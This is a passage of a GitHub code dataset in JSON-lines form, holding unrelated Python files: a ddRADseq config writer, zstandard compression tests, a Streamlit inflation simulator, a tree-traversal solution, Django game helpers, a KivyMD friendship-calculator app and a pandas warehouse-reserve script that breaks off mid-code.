' {0:18} {1}'.format('--pcrdupprob', options_dict['pcrdupprob']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--pcrdistribution', options_dict['pcrdistribution']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--multiparam', options_dict['multiparam']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--poissonparam', options_dict['poissonparam']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--gcfactor', options_dict['gcfactor']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--verbose', options_dict['verbose']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--trace', options_dict['trace']['comment']))\n\n#-------------------------------------------------------------------------------\n\ndef build_config(options_dict):\n '''Build the file with the options by default.'''\n\n # get the config file\n config_file = get_config_file(__file__)\n\n # create the config file and write the default options\n try:\n with open(config_file, mode='w', encoding='iso-8859-1') as config_file_id:\n config_file_id.write('{0:43} # {1}\\n'.format('fragsfile' + '=' + options_dict['fragsfile']['default'], options_dict['fragsfile']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('technique' + '=' + options_dict['technique']['default'], options_dict['technique']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('format' + '=' + options_dict['format']['default'], options_dict['format']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('readsfile' + '=' + options_dict['readsfile']['default'], options_dict['readsfile']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('readtype' + '=' + options_dict['readtype']['default'], options_dict['readtype']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('rsfile' + '=' + options_dict['rsfile']['default'], options_dict['rsfile']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('enzyme1' + '=' + options_dict['enzyme1']['default'], options_dict['enzyme1']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('enzyme2' + '=' + options_dict['enzyme2']['default'], options_dict['enzyme2']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('endsfile' + '=' + options_dict['endsfile']['default'], options_dict['endsfile']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('index1len' + '=' + options_dict['index1len']['default'], options_dict['index1len']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('index2len' + '=' + options_dict['index2len']['default'], options_dict['index2len']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('dbrlen' + '=' + options_dict['dbrlen']['default'], options_dict['dbrlen']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('wend' + '=' + options_dict['wend']['default'], options_dict['wend']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('cend' + '=' + options_dict['cend']['default'], options_dict['cend']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('individualsfile' + '=' + options_dict['individualsfile']['default'], options_dict['individualsfile']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('locinum' + '=' + options_dict['locinum']['default'], options_dict['locinum']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('readsnum' + '=' + options_dict['readsnum']['default'], options_dict['readsnum']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('minreadvar' + '=' + options_dict['minreadvar']['default'], options_dict['minreadvar']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('maxreadvar' + '=' + options_dict['maxreadvar']['default'], options_dict['maxreadvar']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('insertlen' + '=' + options_dict['insertlen']['default'], options_dict['insertlen']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('mutprob' + '=' + options_dict['mutprob']['default'], options_dict['mutprob']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('locusmaxmut' + '=' + options_dict['locusmaxmut']['default'], options_dict['locusmaxmut']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('indelprob' + '=' + options_dict['indelprob']['default'], options_dict['indelprob']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('maxindelsize' + '=' + options_dict['maxindelsize']['default'], options_dict['maxindelsize']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('dropout' + '=' + options_dict['dropout']['default'], options_dict['dropout']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('pcrdupprob' + '=' + options_dict['pcrdupprob']['default'], options_dict['pcrdupprob']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('pcrdistribution' + '=' + options_dict['pcrdistribution']['default'], options_dict['pcrdistribution']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('multiparam' + '=' + options_dict['multiparam']['default'], options_dict['multiparam']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('poissonparam' + '=' + options_dict['poissonparam']['default'], options_dict['poissonparam']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('gcfactor' + '=' + options_dict['gcfactor']['default'], options_dict['gcfactor']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('verbose' + '=' + options_dict['verbose']['default'], options_dict['verbose']['comment']))\n config_file_id.write('{0:43} # {1}\\n'.format('trace' + '=' + options_dict['trace']['default'], options_dict['trace']['comment']))\n except:\n raise ProgramError('F001', config_file)\n\n # show OK message \n Message.print('info', 'The configuration file {0} is created.'.format(get_file_name(config_file)))\n\n#-------------------------------------------------------------------------------\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n sys.exit(0)\n\n#-------------------------------------------------------------------------------\n","repo_name":"GGFHF/ddRADseqTools","sub_path":"Package/simddradseq.py","file_name":"simddradseq.py","file_ext":"py","file_size_in_byte":38050,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"27"} +{"seq_id":"71273694151","text":"import io\nimport unittest\n\nimport zstandard as zstd\n\nfrom .common import (\n CustomBytesIO,\n)\n\n\nclass TestCompressor_read_to_iter(unittest.TestCase):\n def test_type_validation(self):\n cctx = zstd.ZstdCompressor()\n\n # Object with read() works.\n for chunk in cctx.read_to_iter(io.BytesIO()):\n pass\n\n # Buffer protocol works.\n for chunk in cctx.read_to_iter(b\"foobar\"):\n pass\n\n with self.assertRaisesRegex(\n ValueError, \"must pass an object with a read\"\n ):\n for chunk in cctx.read_to_iter(True):\n pass\n\n def test_read_empty(self):\n cctx = zstd.ZstdCompressor(level=1, write_content_size=False)\n\n source = io.BytesIO()\n it = cctx.read_to_iter(source)\n chunks = list(it)\n self.assertEqual(len(chunks), 1)\n compressed = b\"\".join(chunks)\n self.assertEqual(compressed, b\"\\x28\\xb5\\x2f\\xfd\\x00\\x00\\x01\\x00\\x00\")\n\n # And again with the buffer protocol.\n it = cctx.read_to_iter(b\"\")\n chunks = list(it)\n self.assertEqual(len(chunks), 1)\n compressed2 = b\"\".join(chunks)\n self.assertEqual(compressed2, compressed)\n\n def test_read_large(self):\n cctx = zstd.ZstdCompressor(level=1, write_content_size=False)\n\n source = io.BytesIO()\n source.write(b\"f\" * zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE)\n source.write(b\"o\")\n source.seek(0)\n\n # Creating an iterator should not perform any compression until\n # first read.\n it = cctx.read_to_iter(source, size=len(source.getvalue()))\n self.assertEqual(source.tell(), 0)\n\n # We should have exactly 2 output chunks.\n chunks = []\n chunk = next(it)\n self.assertIsNotNone(chunk)\n self.assertEqual(source.tell(), zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE)\n chunks.append(chunk)\n chunk = next(it)\n self.assertIsNotNone(chunk)\n chunks.append(chunk)\n\n self.assertEqual(source.tell(), len(source.getvalue()))\n\n with self.assertRaises(StopIteration):\n next(it)\n\n # And again for good measure.\n with self.assertRaises(StopIteration):\n next(it)\n\n # We should get the same output as the one-shot compression mechanism.\n self.assertEqual(b\"\".join(chunks), cctx.compress(source.getvalue()))\n\n params = zstd.get_frame_parameters(b\"\".join(chunks))\n self.assertEqual(params.content_size, zstd.CONTENTSIZE_UNKNOWN)\n self.assertEqual(params.window_size, 262144)\n self.assertEqual(params.dict_id, 0)\n self.assertFalse(params.has_checksum)\n\n # Now check the buffer protocol.\n it = cctx.read_to_iter(source.getvalue())\n chunks = list(it)\n self.assertEqual(len(chunks), 2)\n\n params = zstd.get_frame_parameters(b\"\".join(chunks))\n self.assertEqual(params.content_size, zstd.CONTENTSIZE_UNKNOWN)\n # self.assertEqual(params.window_size, 262144)\n self.assertEqual(params.dict_id, 0)\n self.assertFalse(params.has_checksum)\n\n self.assertEqual(b\"\".join(chunks), cctx.compress(source.getvalue()))\n\n def test_read_write_size(self):\n source = CustomBytesIO(b\"foobarfoobar\")\n cctx = zstd.ZstdCompressor(level=3)\n for chunk in cctx.read_to_iter(source, read_size=1, write_size=1):\n self.assertEqual(len(chunk), 1)\n\n self.assertEqual(source._read_count, len(source.getvalue()) + 1)\n\n def test_multithreaded(self):\n source = io.BytesIO()\n source.write(b\"a\" * 1048576)\n source.write(b\"b\" * 1048576)\n source.write(b\"c\" * 1048576)\n source.seek(0)\n\n cctx = zstd.ZstdCompressor(threads=2)\n\n compressed = b\"\".join(cctx.read_to_iter(source))\n self.assertEqual(len(compressed), 111)\n\n def test_bad_size(self):\n cctx = zstd.ZstdCompressor()\n\n source = io.BytesIO(b\"a\" * 42)\n\n with self.assertRaisesRegex(zstd.ZstdError, \"Src size is incorrect\"):\n b\"\".join(cctx.read_to_iter(source, size=2))\n\n # Test another operation on errored compressor.\n b\"\".join(cctx.read_to_iter(source))\n\n def test_read_exception(self):\n b = CustomBytesIO(b\"foo\" * 1024)\n b.read_exception = IOError(\"read\")\n\n cctx = zstd.ZstdCompressor()\n\n it = cctx.read_to_iter(b)\n\n with self.assertRaisesRegex(IOError, \"read\"):\n next(it)\n","repo_name":"indygreg/python-zstandard","sub_path":"tests/test_compressor_read_to_iter.py","file_name":"test_compressor_read_to_iter.py","file_ext":"py","file_size_in_byte":4473,"program_lang":"python","lang":"en","doc_type":"code","stars":424,"dataset":"github-code","pt":"27"} +{"seq_id":"41338373864","text":"import numpy as np\nimport pandas as pd\n\nimport altair as alt\n\nfrom .plotting import select_nearest, get_selectors, add_rules, mark_years, add_text\n\n__description__ = \"\"\"\nThis application adjusts an initial capital for inflation. Inflation can be\ngiven by providing an optimistic (minimum), a pessimistic (maximum) and a\nrealistic (mode) estimate.\n\nThe compounding frequency can be either annually (by default) or daily (with\nthe checkbox marked), The results are similar but the interpretation of the\nrates are different when using daily compounding.\n\nThis app does not consider any type of interest or gain, to check the effects\nof compounding interests, check the \"Compound Interest\" and the \"Flex Term vs\nFixed Term\" apps in the sidebar.\n\"\"\"\n\n\ndef inflation_simulation(st, **state):\n st.title(\"Inflation Simulation\")\n st.write(__description__)\n\n st.write(\"## Initial Capital\")\n initial_capital = st.number_input(\"Capital\", value=10_000.0)\n\n st.write(\"## Inflation Estimation\")\n\n left, middle, right = st.columns(3)\n\n optimistic = left.number_input(\"Optimistic Inflation (%)\", value=2.0, min_value=0.0)\n\n realistic_value = max(2.5, optimistic + 0.01)\n realistic = middle.number_input(\n \"Realistic Inflation (%)\", value=realistic_value, min_value=optimistic\n )\n\n pessimistic_value = max(3.5, realistic + 0.01)\n pessimistic = right.number_input(\n \"Pessimistic Inflation (%)\", value=pessimistic_value, min_value=realistic\n )\n\n daily_conpound = st.checkbox(\"Daily Compounding\", value=False)\n\n years = st.slider(\"Years\", min_value=1, max_value=15, value=2)\n\n st.write(\"## Simulation Results\")\n\n median_capital, min_capital, max_capital = simulate_inflation(\n initial_capital, optimistic, realistic, pessimistic, years, daily_conpound\n )\n\n st.write(\"### Capital at the End\")\n\n left, middle, right = st.columns(3)\n\n max_delta = (initial_capital - max_capital[-1]) / initial_capital * 100\n left.metric(\"Optimistic Case\", f\"${max_capital[-1]:.2f}\", f\"-{max_delta:.2f}%\")\n\n min_delta = (initial_capital - min_capital[-1]) / initial_capital * 100\n right.metric(\"Pessimistic Case\", f\"${min_capital[-1]:.2f}\", f\"-{min_delta:.2f}%\")\n\n median_delta = (initial_capital - median_capital[-1]) / initial_capital * 100\n middle.metric(\n \"Realistic Case\", f\"${median_capital[-1]:.2f}\", f\"-{median_delta:.2f}%\"\n )\n\n plot_comparison(st, median_capital, min_capital, max_capital)\n\n\ndef simulate_inflation(\n initial_capital, optimistic, realistic, pessimistic, years, daily_conpound\n):\n runs = 5_000\n days = years * 365\n data = np.tile(initial_capital, (runs, days))\n\n optimistic_rate = optimistic / 100\n realistic_rate = realistic / 100\n pessimistic_rate = pessimistic / 100\n\n generator = np.random.default_rng()\n rate = generator.triangular(\n optimistic_rate, realistic_rate, pessimistic_rate, size=(runs, days)\n )\n\n # Kept as legacy formula\n # interest_rate = rate if daily_conpound else rate * np.linspace(1, 365, days)\n # exponent = np.arange(days) if daily_conpound else years\n\n interest_rate = rate / 365 if daily_conpound else np.power(1 + rate, 1 / 365) - 1\n exponent = np.arange(days)\n\n rate_compound = (1 + interest_rate) ** exponent\n\n data /= rate_compound\n\n median_data = np.median(data, axis=0)\n minimum_bound = np.quantile(data, 0.05, axis=0)\n maximum_bound = np.quantile(data, 0.95, axis=0)\n\n return median_data, minimum_bound, maximum_bound\n\n\ndef plot_comparison(st, median_capital, min_capital, max_capital):\n lenght = len(median_capital)\n\n positions = np.arange(lenght)\n\n coordinates = [\n f\"({pos}, {value:.2f})\" for pos, value in zip(positions, median_capital)\n ]\n\n data = {\n \"x\": positions,\n \"median\": median_capital,\n \"minimal\": min_capital,\n \"maximum\": max_capital,\n \"coordinates\": np.array(coordinates),\n }\n\n df = pd.DataFrame(data)\n\n axis = alt.Axis(labelFontSize=20, titleFontSize=22)\n\n line = (\n alt.Chart(df)\n .mark_line()\n .encode(\n x=alt.X(\n \"x\",\n axis=axis,\n title=\"Time (days)\",\n scale=alt.Scale(domain=[0, lenght], clamp=False, nice=False),\n ),\n y=alt.Y(\"median\", axis=axis, title=\"Capital\", scale=alt.Scale(zero=False)),\n )\n )\n\n area = (\n alt.Chart(df)\n .mark_area()\n .encode(x=alt.X(\"x\"), y=\"minimal:Q\", y2=\"maximum:Q\", opacity=alt.value(0.2))\n )\n\n nearest = select_nearest()\n selectors = get_selectors(df, nearest)\n text = add_text(line, \"coordinates:N\", nearest)\n rules = add_rules(df, nearest)\n years = mark_years(df)\n\n points = line.mark_point().transform_filter(nearest)\n\n chart = (\n alt.layer(line, area, selectors, points, rules, text, years)\n .interactive()\n .properties(\n width=1600, height=500, title=\"Real Value over Time Adjusted for Inflation\"\n )\n .configure_title(fontSize=24)\n )\n\n st.altair_chart(chart, use_container_width=True)\n","repo_name":"ELC/finance-tools","sub_path":"pages/inflation.py","file_name":"inflation.py","file_ext":"py","file_size_in_byte":5131,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"27"} +{"seq_id":"7902483476","text":"\"\"\"\nGiven a binary tree A consisting of N nodes, return a 2-D array denoting the vertical order traversal of A.\n\nGo through the example and image for more details.\n\nNOTE:\n\n If 2 or more Tree Nodes shares the same vertical level then the one with earlier occurence in the level-order traversal of tree comes first in the output.\n Row 1 of the output array will be the nodes on leftmost vertical line similarly last row of the output array will be the nodes on the rightmost vertical line.\n\n\nWe need to keep track of the number of left moves it makes, and number of right moves\nuse a dict to group the elements\nuse queue to treverse the tree bfs style\nturn dict into list (iterate from min key to max key)\n\n\nO(n) time complexity\nO(w) space where w is the width of the tree\n\n\n\"\"\"\nimport collections\nfrom typing import List, Optional, Dict\n\n\n# Definition for a binary tree node\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nQueueNode = collections.namedtuple('QueueNode', 'node level')\n\n\nclass Solution:\n # @param A : root node of tree\n # @return a list of list of integers\n def verticalOrderTraversal(self, root: TreeNode) -> List[List[int]]:\n if not root:\n return []\n deque = collections.deque()\n deque.append(QueueNode(root, 0))\n levels: Dict[int, List[int]] = collections.defaultdict(list)\n while deque:\n node, level = deque.popleft()\n if not node:\n continue\n levels[level].append(node.val)\n deque.append(QueueNode(node.left, level - 1))\n deque.append(QueueNode(node.right, level + 1))\n return self.build_result(levels)\n\n def build_result(self, levels: Dict[int, List[int]]) -> List[List[int]]:\n result: List[List[int]] = []\n min_level: int = min(levels)\n max_level: int = max(levels)\n for level in range(min_level, max_level + 1):\n result.append(levels[level])\n return result\n\n","repo_name":"JadielTeofilo/General-Algorithms","sub_path":"src/interviewbit/tree/vertical_traversal.py","file_name":"vertical_traversal.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"4670456629","text":"# -*- coding: utf-8 -*-\n\"\"\"\nDocumentation for this lies in readme.md\n\"\"\"\n\nfrom datetime import datetime\nfrom django.core.exceptions import ValidationError\n\nfrom kingdom.models import Kingdom, Folk, Message, Quality, Claim\n\n\n######\n# Kingdom scripts\n######\ndef kingdom_message(self, content, level=Message.INFORMATION):\n\t\"\"\"\n\tRegister a message on this kingdom.\n\t\"\"\"\n\n\tMessage(\n\t\tkingdom=self,\n\t\tcontent=content\n\t).save()\nKingdom.message = kingdom_message\n\n\ndef kingdom_add_claim(self, kingdom, level):\n\t\"\"\"\n\tAdd a claim on specified kingdom.\n\t\"\"\"\n\n\tClaim(\n\t\toffender=kingdom,\n\t\toffended=self,\n\t\tlevel=level\n\t).save()\nKingdom.add_claim = kingdom_add_claim\n\n\ndef kingdom_has_claim(self, kingdom):\n\t\"\"\"\n\tReturns None if there is no claim, or returns the level of the claim\n\t\"\"\"\n\n\ttry:\n\t\tclaim = self.offended_set.get(offender=kingdom)\n\t\treturn claim.level\n\texcept Claim.DoesNotExist:\n\t\treturn None\nKingdom.has_claim = kingdom_has_claim\n\n\n######\n# Folks scripts\n######\ndef folk_die(self):\n\t\"\"\"\n\tKill this folk.\n\t\"\"\"\n\n\tself.death = datetime.now()\n\tself.save()\nFolk.die = folk_die\n\n\ndef folk_age(self):\n\t\"\"\"\n\tReturn the age in year for this folk,\n\tOne real day is one year.\n\t\"\"\"\n\n\tif self.death is not None:\n\t\traise ValidationError(\"Calling age() on a dead person is not allowed.\")\n\treturn (datetime.now() - self.birth).days\nFolk.age = folk_age\n\n\ndef folk_add_quality(self, slug):\n\t\"\"\"\n\tAdd a new quality.\n\t\"\"\"\n\n\tquality = Quality.objects.get(slug=slug)\n\ttry:\n\t\tself.quality_set.add(quality)\n\texcept:\n\t\tpass\n\treturn quality\nFolk.add_quality = folk_add_quality\n\n\ndef folk_has_quality(self, slug):\n\t\"\"\"\n\tReturns True is the folk has the quality\n\t\"\"\"\n\n\treturn self.quality_set.filter(slug=slug).exists()\nFolk.has_quality = folk_has_quality\n\n\ndef folk_remove_quality(self, slug):\n\t\"\"\"\n\tAdd a new quality.\n\t\"\"\"\n\n\tquality = Quality.objects.get(slug=slug)\n\ttry:\n\t\tself.quality_set.remove(quality)\n\texcept:\n\t\tpass\n\treturn quality\nFolk.remove_quality = folk_remove_quality\n\n\ndef sum_stats(folks, attribute):\n\t\"\"\"\n\tReturns the sum of the chosen attribute\n\t\"\"\"\n\n\treturn sum([getattr(folk, attribute) for folk in folks])\n\n\ndef avg_stats(folks, attribute):\n\t\"\"\"\n\tReturns the average of the chosen attribute\n\t\"\"\"\n\t\n\tif len(folks) == 0:\n\t\treturn 0\n\telse:\n\t\treturn sum_stats(folks, attribute) / len(folks)\n","repo_name":"Neamar/kingdoms","sub_path":"kingdom/scripts.py","file_name":"scripts.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"27"} +{"seq_id":"72510594631","text":"from kivymd.app import MDApp\r\nfrom kivy.uix.screenmanager import Screen, ScreenManager, SlideTransition\r\nfrom kivymd.uix.snackbar import Snackbar\r\nfrom kivymd.uix.dialog import MDDialog\r\nfrom kivy.lang import Builder\r\nfrom kivymd.uix.button import MDFlatButton\r\nfrom kivymd.uix.label import MDLabel\r\nimport random\r\n\r\n\r\n\r\nclass StartScreen(Screen):\r\n\t\r\n\tdef checkentry(self):\r\n\t\tfield1 = self.ids.text1.text\r\n\t\tfield2 = self.ids.text2.text\r\n\t\tif len(field1)==0 or len(field2)==0 :\r\n\t\t\tSnackbar(text=\"Please Check Your Names\").show()\r\n\t\t\tcbutton = MDFlatButton(text='Close',on_release=self.closeNN)\r\n\t\t\tClose_button = [cbutton]\r\n\t\t\tself.dialog2 = MDDialog(title='Warning', text=\"The Following Stats Might Be Falsy Because of Invalid Names. Please Try Again With Corrrect Names\", size_hint=(0.95,1), buttons=Close_button)\r\n\t\t\tself.dialog2.open()\r\n\t\tpsbl = [\"ayush\",\"Ayush\"]\r\n\t\tmessage = \"Woah, It turns out that you are friends with Ayush. Ayush is the the sweetest guy you'll ever meet in your life. Make sure to keep him Happy!\"\r\n\r\n\tdef closeN(self,obj):\r\n\t\tself.dialog1.dismiss()\r\n\r\n\tdef closeNN(self,obj):\r\n\t\tself.dialog2.dismiss()\r\n\r\n\tdef callback(self):\r\n\t\tcbutton = MDFlatButton(text='Close',on_release=self.close)\r\n\t\tClose_button = [cbutton]\r\n\t\tself.dialog = MDDialog(title='Share With Your Friends.', text='Share This App with your Friends.\\nIn Any Way You Can think Of.', size_hint=(0.95,1), buttons=Close_button)\r\n\t\tself.dialog.open()\r\n\r\n\tdef close(self,obj):\r\n\t\tself.dialog.dismiss()\r\n\r\n\tdef addwidgets(self):\r\n\t\tpass\r\n\t\t\r\n\r\nclass NextScreen(Screen):\r\n\t\r\n\tn = 0\r\n\tpercentage = round(random.randint(1,30) * 3.33 , 2)\r\n\t\t\r\n\tdef calculator(self):\r\n\t\t\r\n\t\tprint(self.percentage)\r\n\t\treturn self.percentage\r\n\r\n\tdef level(self, value):\r\n\t\tprint(value)\r\n\t\tif value >= 90:\r\n\t\t\tmessage = \"Extremely Awesomely Fantastic Friendship\"\r\n\t\t\treturn message\r\n\r\n\t\telif value >= 80 and value < 90:\r\n\t\t\tmessage = \"Awesomely Fantastic Friendship\"\r\n\t\t\treturn message\r\n\r\n\t\telif value>= 70 and value < 80:\r\n\t\t\tmessage = \"Fantastic Friendship\"\r\n\t\t\treturn message\r\n\r\n\t\telif value >= 50 and value < 70:\r\n\t\t\tmessage = \"Average Friendship\"\r\n\t\t\treturn message\r\n\r\n\t\telif value >= 30 and value < 50:\r\n\t\t\tmessage = \"You Need to work on your Friendship!\"\r\n\t\t\treturn message\r\n\r\n\t\telif value >= 1 and value < 30:\r\n\t\t\tmessage = \"Do You Even Know This Person?\"\r\n\t\t\treturn message\r\n\t\telse:\r\n\t\t\tpass\r\n\tdef clearcache(self):\r\n\t\t\r\n\t\ttry:\r\n\t\t\tself.remove_widget(self.ids.box)\r\n\t\t\tself.remove_widget(self.ids.box1)\r\n\t\texcept:\r\n\t\t\tpass\r\n\t\t\r\n\t\tself.removeW()\r\n\t\tprint(\"Removed\")\r\n\t\tself.addW()\r\n\t\tprint(\"Added\")\r\n\t\t\r\n\t\t\r\n\t\t\r\n\t\r\n\tdef removeW(self):\r\n\t\tself.n+=1\r\n\t\tif self.n != 1:\r\n\t\t\tself.remove_widget(self.box)\r\n\t\t\tself.remove_widget(self.box1)\r\n\r\n\tdef addW(self):\r\n\t\tNpercentage = round(random.randint(1,30) * 3.33 , 2)\r\n\t\tprint(Npercentage)\r\n\t\tself.box = MDLabel(\r\n\t\t\t\ttext= f\"{Npercentage} %\",\r\n\t\t\t\thalign= 'center',\r\n\t\t\t\tfont_style= 'H1',\r\n\t\t\t\ttheme_text_color= 'Custom',\r\n\t\t\t\ttext_color= (1,0,0,1),\r\n\t\t\t\tpos_hint= {'center_x':0.5, 'center_y':0.9})\r\n\t\tself.add_widget(self.box)\r\n\t\tself.box1 = MDLabel(\r\n\t\t\t\ttext= f\"{self.level(Npercentage)}\",\r\n\t\t\t\thalign= 'center',\r\n\t\t\t\tfont_style= 'H3',\r\n\t\t\t\ttheme_text_color= 'Custom',\r\n\t\t\t\ttext_color= (0,0,1,1),\r\n\t\t\t\tpos_hint= {'center_x':0.5, 'center_y':0.5})\r\n\t\tself.add_widget(self.box1)\r\n\t\t\r\n\r\nclass ScreenManager(ScreenManager):\r\n\tpass\r\n\r\n\r\nclass MyApp(MDApp):\r\n\tdef build(self):\r\n\t\tself.theme_cls.primary_palette= \"Purple\"\r\n\t\tmaster = Builder.load_file(\"main.kv\")\r\n\t\treturn master\r\n\t\r\n\r\nMyApp().run()\r\n","repo_name":"AyushUlric/FirstApp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"28208112749","text":"\"\"\"\nСкрипт подготавливает файл с резервами в удобном формате\n\n\"\"\"\nimport utils\nutils.path_append()\n\nimport os\nimport datetime as dt\nimport pandas as pd\n\n\nfrom hidden_settings import WAREHOUSE_RESERVE\nfrom service import get_filtered_df, save_to_excel, print_complete, get_data\nfrom settings import CODES, HOLDING, NAME_HOLDING, LINK_HOLDING, LINK, WHS, EAN\nfrom settings import SOFT_RSV, HARD_RSV, SOFT_HARD_RSV, QUOTA, PRODUCT, CURRENT\nfrom settings import QUOTA_BY_AVAILABLE, AVAILABLE_REST, TOTAL_RSV, DATE_RSV\nfrom settings import TABLE_RESERVE, SOURCE_DIR, RESULT_DIR, TABLE_HOLDINGS\nfrom settings import FUTURE, TABLE_RESERVE_CURRENT, TABLE_RESERVE_FUTURE\nfrom settings import SOFT_HARD_RSV_CURRENT, SOFT_HARD_RSV_FUTURE, EXPECTED_DATE\nfrom settings import TABLE_RSV_BY_DATE, EXCLUDE_STRING, TABLE_EXCEPTIONS\nfrom settings import EX_RSV, PG_PROGRAMM, WORD_YES\n\n\nSOURCE_FILE = '1275 - Резервы и резервы-квоты по холдингам.xlsx'\nEMPTY_ROWS = 2\nHOLDING_LOC = 'Код холдинга'\nRSV_HOLDING = 'Наименование'\nWHS_LOC = 'Склад'\nEAN_LOC = 'EAN'\nPRODUCT_NAME = 'Наименование товара'\nSOFT_RSV_LOC = 'Мягкий резерв'\nHARD_RSV_LOC = 'Жесткий резерв'\nQUOTA_RSV = 'Резерв квота остаток'\nBY_LINK = '_всего, по ШК-Склад'\nAVAILABLE = 'Доступность на складе'\nEXPECTED_DATE_LOC = 'Дата ожидаемой доставки'\nRESERVE_FOR = 'Дата резерва По'\nLINK_DATE = 'Сцепка Дата-Склад-Наименование холдинга-ШК'\n\n\ndef get_reserve():\n excel = pd.ExcelFile(SOURCE_DIR + SOURCE_FILE)\n df = get_filtered_df(\n excel, WAREHOUSE_RESERVE, WHS_LOC, skiprows=EMPTY_ROWS\n )\n holdings = pd.ExcelFile(RESULT_DIR + TABLE_HOLDINGS).parse()\n df = pd.merge(\n df.rename(columns={HOLDING_LOC: CODES}),\n holdings, on=CODES, how='left'\n )\n idx = df[df[HOLDING].isnull()].index\n df.loc[idx, HOLDING] = df.loc[idx, CODES]\n df.loc[idx, NAME_HOLDING] = df.loc[idx, RSV_HOLDING]\n df.loc[df[AVAILABLE] < 0, AVAILABLE] = 0\n return df\n\n\ndef reserve_by_date(df):\n static_col = [\n WHS_LOC, NAME_HOLDING, EAN_LOC,\n PRODUCT_NAME, EXPECTED_DATE_LOC\n ]\n num_col = [SOFT_RSV_LOC, HARD_RSV_LOC, QUOTA_RSV]\n df = df[static_col + num_col].copy().groupby(\n static_col, dropna=False\n )[num_col].sum().reset_index()\n df[LINK_DATE] = (df[EXPECTED_DATE_LOC].map(str) + df[WHS_LOC]\n + df[NAME_HOLDING] + df[EAN_LOC].map(str))\n df[LINK] = df[WHS_LOC] + df[EAN_LOC].map(str)\n\n df[EXCLUDE_STRING] = ''\n df_except = get_data(TABLE_EXCEPTIONS)\n ex_list = list(set(df_except[EX_RSV].to_list()))\n idx = df[df[LINK_DATE].isin(ex_list)].index\n df.loc[idx, EXCLUDE_STRING] = WORD_YES\n\n df_holdings = get_data(TABLE_HOLDINGS)[[\n NAME_HOLDING, PG_PROGRAMM\n ]].drop_duplicates(subset=[NAME_HOLDING])\n df = df.merge(df_holdings, on=NAME_HOLDING, how='left')\n static_col = [\n WHS_LOC, NAME_HOLDING, PG_PROGRAMM, EAN_LOC,\n PRODUCT_NAME, EXPECTED_DATE_LOC\n ]\n\n df = df[static_col + num_col + [EXCLUDE_STRING, LINK_DATE, LINK]]\n df = df.rename(columns={\n WHS_LOC: WHS,\n EAN_LOC: EAN,\n PRODUCT_NAME: PRODUCT,\n SOFT_RSV_LOC: SOFT_RSV,\n HARD_RSV_LOC: HARD_RSV,\n QUOTA_RSV: QUOTA,\n EXPECTED_DATE_LOC: EXPECTED_DATE\n })\n return df\n\n\ndef table_processing(df, period=None):\n idx_date = df.loc[df[EXPECTED_DATE_LOC].isnull()].index\n df.loc[idx_date, EXPECTED_DATE_LOC] = df.loc[idx_date, RESERVE_FOR]\n today = dt.date.today() - dt.timedelta(days=1)\n next_month = today.month + 1 if today.month < 12 else 1\n next_month_fday = pd.to_datetime(dt.date(today.year, next_month, 1))\n if period == CURRENT:\n df = df[df[EXPECTED_DATE_LOC] < next_month_fday]\n elif period == FUTURE:\n df = df[df[EXPECTED_DATE_LOC] >= next_month_fday]\n\n group_df = df.groupby([\n WHS_LOC, HOLDING, NAME_HOLDING, EAN_LOC, PRODUCT_NAME\n ]).agg({\n SOFT_RSV_LOC: 'sum',\n HARD_RSV_LOC: 'sum',\n QUOTA_RSV: 'sum',\n AVAILABLE: 'max',\n EXPECTED_DATE_LOC: 'max'\n }).reset_index()\n group_df.insert(0, LINK, group_df[WHS_LOC] + group_df[EAN_LOC].map(str))\n group_df.insert(\n 0, LINK_HOLDING,\n group_df[WHS_LOC] + group_df[NAME_HOLDING] + group_df[EAN_LOC].map(str)\n )\n group_df = group_df.merge(\n group_df.groupby([LINK]).agg({QUOTA_RSV: 'sum'}),\n on=LINK,\n how='left',\n 